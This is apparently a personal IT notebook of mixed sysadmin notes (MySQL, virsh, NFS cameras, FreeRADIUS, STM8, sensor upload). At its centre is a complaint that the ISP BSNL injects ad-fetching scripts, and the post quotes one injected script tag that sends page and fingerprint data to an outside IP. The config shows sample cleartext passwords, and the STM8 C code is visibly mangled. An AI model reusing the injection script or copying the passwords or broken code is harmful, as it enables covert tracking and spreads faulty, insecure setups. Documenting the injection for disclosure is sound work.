After restoring mysql dump from pc 55 to sciforum found the user of sciforum vanished, all table database privileges of local system gone.

The lesson learned is never restore everything , the the needed tables and restore these. OR atleast exclude mysql user tables and recreate user, tables, db privileges.

Created user wp again and then found issues on update command of mysql, getting error “can not load from mysql.proc”

run command 
mysql_upgrade -u root -p 
and the problem is fixed

RENAMING VM

hrgserver:~ # virsh dumpxml OL81 >MasterDB.xml
hrgserver:~ # virsh undefine OL81
Domain OL81 has been undefined
hrgserver:~ # vi MasterDB.xml
hrgserver:~ # virsh define MasterDB.xml
Domain MasterDB defined from MasterDB.xml

hrgserver:~ # virsh list –all

Id Name State

0 Domain-0 running
1 sciforum running
3 netware running
4 zs20804 running
26 Kaspersky running

• MasterDB shut off

hrgserver:~ # virsh start MasterDB
Domain MasterDB started

CHANGE BOOT ORDER

<os>
  <type>hvm</type>
  <loader>/usr/lib/xen/boot/hvmloader</loader>
  <boot dev='network'/>
  <boot dev='cdrom'/>
  <boot dev='hd'/>
  <bootmenu enable='yes'/>
</os>

see updated info at the end.(new officially spamming IP of BSNL is 117.254.84.212).

I am extremely paranoid to see automatic pop-ups to dangerous advertisement sites like newsprofin, cobalten etc . I am using legitimate websites like onecsir.res.in (our ERP site), nmlcsir.attendance.gov.in (GoI Biometric attendance e.g AeBAS site). But sometimes when I touch a click button or scrollbar or any other navigation button the ad popup comes up with malicious website.

I tried many things like reseting browser scanning with antivirus etc. but with no results.

I worried too much and uninstalled almost all software from my PC, all my licensed software like Texas instruments development tools and modules, Intel compilers and drivers, Cosmic Software, STM development tools, Visual Studio etc…. Run almost all available antivirus on the Internet to find “no virus found” or false detections like “CCleaner as a trojan” or a “VS tool as FakeMS”. I remove those also but still getting the nonsense popups.

Now I do not have even the printer,scanner, audio or video driver in the system.

STILL GETTING THE NEWSPROFIN AND COBALTEN. Extremely irritated lost more than two weeks. What the hell our licensed business version of Kaspersky is doing? Why to blame only kaspersky, I failed to remove these even using other antiviruses like quickheal, bitdefender, quihoo360, Avira …. all antispyware like AdAware, SpyHunter, RKill ……

I doubted the DNS spoofing so installed unbound and configured using cloudflare dns. But using it did not resolve the issue. I thought I have to configure it for the lab, at a letter stage to avoid any DNS spoofing.

At Last found some rascal siting at BSNL (our ISP) is doing the menace. I installed a very old tool as a proxy to intercept all urls, IPs, headers and data flowing from/to my browser. Two observations to surprises me

1. Whenever starting chrome number of random url queries gets generated with various different names and DNS is failing to provide any IP and these are not successful to fetch any data.

Find out on googling that this is a normal behavior of Chrome to test its working internally.

2. The sites above are trying to fetch some url(script) from a BSNL IP 117.245.143.67 which in turn going to get these advertisements. A script was injected to original contents in the header.

Quite surprising two different sites trying to fetch same IP.

Then I tried to get whats common !!! Its both are using flash . Tried to check with other flash site and found that also trying to get scripts from SAME IP!!!!!!!!!

See screen shots below. No doubt some BSNL Employee or Contractor/Vendor maybe earning HUGE MONEY by modifying the traffic of legitimate website and injecting these scripts to fetch Advertisements. But its giving control through script embedding in same legitimate web page.

I have got such redirected pop-up even from ICICI Bank website ….. its too dangerous….. Its sending many information to advertiser website including website you are accessing , location, username etc….

When the script is called from same webpage ( As the script was injected in same page ), if you a developer you can imagine what can be done. The content of the script has full control over the page and its variables. The Password or Username can be easily fetched or modified.

Do I need to say more..

WHOM TO COMPLAINT I DO NOT KNOW. How many people understand these technological terms/issues. Who will take these legal issues.

Such modification and injection of malicious script by ISP is heinous crime, can anyone take this legally, how to get and preserve evidences.

There are three cases of bank fraud recently at CSIR-NML, I do not know if these are connected/related. One of my financial site locked my password due to too many invalid login attempts. I reset and changed password but they do not divulge the source IP of the defaulter.

After getting URL I searched google with “getjs?nadipdata” to find following reference information (earlier I was searching with newsprofin and cobalten words to land up in wrong sites with cleanup instructions):

https://www.quora.com/profile/Shiv-Kumar-148
https://stackoverflow.com/questions/51064933/unknown-scripts-are-running-and-redirecting-on-click-to-unknown-websties
https://www.abuseipdb.com/check/117.245.143.67
http://ddecode.com/hexdecoder/?results=e49a704a3dad51b190f3f83b78427cc8
https://security.stackexchange.com/questions/157828/my-isp-bsnl-india-is-injecting-ads-using-phozeca-which-spoils-websites-and-mak
https://www.liveipmap.com/117.245.143.67
https://gist.github.com/asdofindia
https://bgjir.wordpress.com/tag/malware/
https://tutel.me/c/programming/questions/51064933/unknown+scripts+are+running+and+redirecting+on+click+to+unknown+websties

I do not know BSNL needs how much proof to take serious action on the owner of IP 117.245.143.67.

Such episode are really painful, I lost my peace of mind for more than two weeks. Still do not know what to do ? When your ISP does such things what you can do ?

Here are some captured screen shots (IP owner info below):

IP Owner Information as per ICAAN Record:

inetnum:        117.245.128.0 - 117.245.143.255
netname:        BSNL-GSM-NorthZone
descr:          BSNL GSM North Zone, O/o Sr GM (CMTS), NC, Chandigarh
country:        IN
admin-c:        JS2127-AP
tech-c:         RV131-AP
status:         ASSIGNED NON-PORTABLE
mnt-by:         MAINT-IN-DOT
mnt-irt:        IRT-BSNL-IN
last-modified:  2014-12-02T09:38:12Z
source:         APNIC

irt:            IRT-BSNL-IN
address:        Internet Cell
address:        Bharat Sanchar Nigam Limited
address:        8th Floor,148-B Statesman House
address:        Barakhamba Road, New Delhi - 110 001
e-mail:         abuse@bsnl.in
abuse-mailbox:  abuse@bsnl.in
admin-c:        NC83-AP
tech-c:         CGMD1-AP
auth:           # Filtered
mnt-by:         MAINT-IN-DOT
last-modified:  2017-10-20T05:42:50Z
source:         APNIC

person:         Jitender Setia
address:        Addl GM (P&A), O/o Sr GM (CMTS), NC, Chandigarh
country:        IN
phone:          +91-172-2271033
fax-no:         +91-172-2271033
e-mail:         dgmdevnc@gmail.com
nic-hdl:        JS2127-AP
mnt-by:         MAINT-IN-PER-DOT
last-modified:  2012-12-10T09:50:52Z
source:         APNIC

person:         Rajiv Verma
address:        SDE (IN-Opn-III), O/o Sr GM (CMTS), NC, Chandigarh
country:        IN
phone:          +91-172-2271033
fax-no:         +91-172-2271033
e-mail:         rajiv6789@gmail.com
nic-hdl:        RV131-AP
mnt-by:         MAINT-IN-PER-DOT
last-modified:  2012-12-10T09:51:08Z
source:         APNIC

route:          117.245.128.0/20
descr:          BSNL Internet
country:        IN
origin:         AS9829
mnt-lower:      MAINT-IN-DOT
mnt-routes:     MAINT-IN-DOT
mnt-by:         MAINT-IN-AS9829
last-modified:  2008-09-04T07:55:07Z
source:         APNIC



Update 04Sep2019 : BSNL now injecting the following script:
<script async="" src="//117.254.84.212:3000/getjs?nadipdata=&quot;%7B%22url%22:%22%2Fjquery-1.11.3.min.js%22%2C%22referer%22:%22http:%2F%2Fwww.vizzed.com%2Fboards%2Fthread.php%3Fid%3D72161%22%2C%22host%22:%22www.vizzed.com%22%2C%22categories%22:%5B0%5D%2C%22reputations%22:%5B1%5D%2C%22nadipdomain%22:1%2C%22policyid%22:0%7D&quot;&amp;screenheight=1080&amp;screenwidth=1920&amp;tm=1567601038449&amp;lib=true&amp;fingerprint=c2VwLW5vLXJlZGlyZWN0"></script>

For connecting Hikvision camera to NFS storage

In NFS server:
create a separate Logical Volume

example:
——————————————————————————–
--- Logical volume ---
LV Name /dev/vgcam/lvcam1
VG Name vgcam
LV UUID lxdWGO-UqBv-Da0U-dYGM-hzgJ-Zwjp-bNDLXc
LV Write Access read/write
LV Status available
# open 1
LV Size 200.00 GB
Current LE 51200
Segments 1
Allocation contiguous
Read ahead sectors auto
- currently set to 256
Block device 253:8

— Logical volume —
LV Name /dev/vgcam/lvcam2
VG Name vgcam
LV UUID Dei4BM-ePKK-383k-JO7t-F082-VBBJ-mEZQ3v
LV Write Access read/write
LV Status available
# open 1
LV Size 200.00 GB
Current LE 51200
Segments 1
Allocation contiguous
Read ahead sectors auto
– currently set to 256
Block device 253:9
————————————————————————————————

Now mount these volumes to say /cam1 /cam2

/dev/mapper/vgcam-lvcam1 on /cam1 type xfs (rw,nosuid,nodev,noexec,relatime,attr2,noquota)
/dev/mapper/vgcam-lvcam2 on /cam2 type xfs (rw,nosuid,nodev,noexec,relatime,attr2,noquota)

create a data folder in each of these e.g.
mkdir /cam1/data
mkdir /cam2/data

create and export in nfs as follows where 192.168.123.1 and 192.168.123.2 are the IPs of Cameras

/cam1/data 192.168.123.1(async,insecure,rw,nohide)
/cam2/data 192.168.123.2(async,insecure,rw,nohide)

restart nfs service
service nfs restart

Now at the camera configure screen goto
Storage
Storage Management
NetHDD Tab

Enter serverIPAddress, FilePath, Type, MountingType,Username,Password e.g
192.168.123.250 /cam2/data NAS NFS nousername nopassword
Save it

Next goto HDD Management Tab

HDD Management
It will show the attached drive as follows
HDD No. Capacity Freespace Status Type Property Progress
9 199.90GB 197.50GB Normal NAS R/W

Select this and click on Format

After completion for format command goto
System
Maintenance
Reboot

After rebooting check recording under Playback Option.

RadiusMysql setup checked using Karbonn Mobile and is working fine. Only entries in the following four tables is required.

radcheck
5 bdKarbonn Cleartext-Password := abcd1234

radusergroup
bdKarbonn nmlsqlwifi 1

radgroupcheck
21 nmlsqlwifi Auth-Type := EAP

radgroupreply
32 nmlsqlwifi Service-Type := Framed-User
33 nmlsqlwifi Tunnel-Type := VLAN
34 nmlsqlwifi Tunnel-Medium-Type := IEEE-802
35 nmlsqlwifi Tunnel-Private-Group-ID := 3

————— other relevent ————
modules/cui: database = “mysql”
radiusd.conf: $INCLUDE sql.conf
radiusd.conf: $INCLUDE sql/mysql/counter.conf
sql.conf: database = “mysql”

sql.conf:sql {
sql.conf: database = “mysql”
sql.conf:
sql.conf: driver = “rlm_sql_${database}”
sql.conf:
sql.conf: server = “localhost”
sql.conf: login = “radius”
sql.conf: password = “mysqlsvrpw”
sql.conf:
sql.conf: radius_db = “radius”
sql.conf:
sql.conf: acct_table1 = “radacct”
sql.conf: acct_table2 = “radacct”
sql.conf:
sql.conf: postauth_table = “radpostauth”
sql.conf:
sql.conf: authcheck_table = “radcheck”
sql.conf: authreply_table = “radreply”
sql.conf:
sql.conf: groupcheck_table = “radgroupcheck”
sql.conf: groupreply_table = “radgroupreply”
sql.conf:
sql.conf: usergroup_table = “radusergroup”
sql.conf:
sql.conf:
sql.conf: deletestalesessions = yes
sql.conf:
sql.conf: sqltrace = no
sql.conf: sqltracefile = ${logdir}/sqltrace.sql
sql.conf:
sql.conf: num_sql_socks = 5
sql.conf:
sql.conf: connect_failure_retry_delay = 60
sql.conf:
sql.conf: lifetime = 0
sql.conf:
sql.conf: max_queries = 0
sql.conf:
sql.conf:
sql.conf: nas_table = “nas”
sql.conf:
sql.conf: $INCLUDE sql/${database}/dialup.conf
sql.conf:}

https://thingspeak.com/channels/111855/charts/2?start=2017-07-10%2010:10:10&end=2017-07-10%2011:11:11

Install ST visual Develop
install STM8S_StdPeriph_Driver

create file with following code (after —– till net —-)
copy stm8s_conf from STM8S_StdPeriph_Lib\Project\STM8S_StdPeriph_Template directory to your source directory
download adn install cosmic then

set cosmic path e.g. C:\Program Files (x86)\COSMIC\FSE_Compilers\CXSTM8 under project->setting ->general ->rootpath and toolset as “STM8 COSMIC”

Now complie and full build should work


#define STM8S103
#include "stm8s.h"

void myDelay(int k);

void myDelay(int k)
{
int i,j;
for(i=0;iDDR |=0x20;// PB.5 as Output
GPIOB->CR1 |=0x20;// PB.5 as Push Pull Type Output

/* Infinite loop */
while (1)
{
GPIOB->ODR |=1<<5;// PB.5 = 1 OFF myDelay(5000); GPIOB->ODR &=~(1<<5);// PB.5 = 0 ON myDelay(500); GPIOB->ODR |=1<<5;// PB.5 = 1 OFF myDelay(500); GPIOB->ODR &=~(1<<5);// PB.5 = 0 ON myDelay(500); GPIOB->ODR |=1<<5;// PB.5 = 1 OFF myDelay(2000); GPIOB->ODR &=~(1<<5);// PB.5 = 0 ON myDelay(500); GPIOB->ODR |=1<<5;// PB.5 = 1 OFF myDelay(500); GPIOB->ODR &=~(1<<5);// PB.5 = 0 ON myDelay(500); GPIOB->ODR |=1<<5;// PB.5 = 1 OFF myDelay(500); GPIOB->ODR &=~(1<<5);// PB.5 = 0 ON myDelay(500); GPIOB->ODR |=1<<5;// PB.5 = 1 OFF myDelay(500); GPIOB->ODR &=~(1<<5);// PB.5 = 0 ON myDelay(500); // myDelay(5000); } } #ifdef USE_FULL_ASSERT /** * @brief Reports the name of the source file and the source line number * where the assert_param error has occurred. * @param file: pointer to the source file name * @param line: assert_param error line source number * @retval : None */ void assert_failed(u8* file, u32 line) { /* User can add his own implementation to report the file name and line number, ex: printf("Wrong parameters value: file %s on line %d\r\n", file, line) */ /* Infinite loop */ while (1) { } } #endif


# cat /root/bin/iot-carriots.sh

#!/bin/bash

#created by Byomkesh on 10-14Feb2018

echo '
v1 now
ictuxen2@byomkesh.byomkesh
' >/root/bin/data/iotdata.txt

/opt/MegaRAID/MegaCli/MegaCli64 -PDList -aALL|grep -e Temp -e Slot|tr -s '\n' ' '|perl -e '$in=<>; $in =~ /Slot Number: ([^ ]*) .*Drive Temperature :[ ]*([^ ]*)C .*Slot Number: ([^ ]*) .*Drive Temperature :[ ]*([^ ]*)C .*Slot Number: ([^ ]*) .*Drive Temperature :[ ]*([^ ]*)C .*Slot Number: ([^ ]*) .*Drive Temperature :[ ]*([^ ]*)C .*Slot Number: ([^ ]*) .*Drive Temperature :[ ]*([^ ]*)C .*/; print "$1 $2 $3 $4 $5 $6 $7 $8 $9 $10"'|(read a b c d e f g h i j k; echo -n ''$b''$d''$f''$h''$j'';) >>/root/bin/data/iotdata.txt
/usr/sbin/isensor -s -g fan,temp,voltage,current|cut -d "|" -f 5,7|sed -e 's/ //g' -e's/\+//g' -e's/\%//g'|grep -e "C$" -e "V$" -e "A$" -e"RPM$"|tr -s '|' ' '|sed -e "s/C$//" -e "s/V$//" -e "s/A$//" -e"s/RPM$//"|while read a b c ; do a=`echo $a|tr '\.' '_'`; echo -n '<'$a'>'$b''; done >>/root/bin/data/iotdata.txt

echo '

' >>/root/bin/data/iotdata.txt

curl -s --request POST --data-binary @/root/bin/data/iotdata.txt --header "carriots.apikey:6xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx6" --header "content-type:application/xml" http://api.carriots.com/streams 2>&1 >/dev/null

#curl -s --request POST --data-binary @/root/bin/data/iotdata.txt --header "carriots.apikey:6xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx66" --header "content-type:application/xml" http://api.carriots.com/streams

# cat /root/bin/data/iotdata.txt

yum install ipmi\*
/usr/sbin/isensor -g fan,temp,voltage,current

This now integrated to carriots site.